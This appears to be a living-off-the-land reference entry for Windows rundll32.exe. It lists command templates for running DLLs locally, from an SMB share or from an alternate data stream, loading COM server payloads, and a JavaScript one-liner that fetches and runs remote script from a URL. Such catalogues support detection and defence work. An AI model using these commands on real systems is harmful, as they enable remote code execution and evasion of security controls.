Used by Windows to execute dll files
First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.
rundll32.exe {PATH},EntryPoint
Execute DLL file
Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.
rundll32.exe {PATH_SMB:.dll},EntryPoint
Execute DLL from SMB share.
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
Execute code from Internet
Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
rundll32.exe -sta {CLSID}
Execute a DLL/EXE COM server payload or ScriptletURL code.
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
rundll32 "{PATH}:ADSDLL.dll",DllMain
Execute code from alternate data stream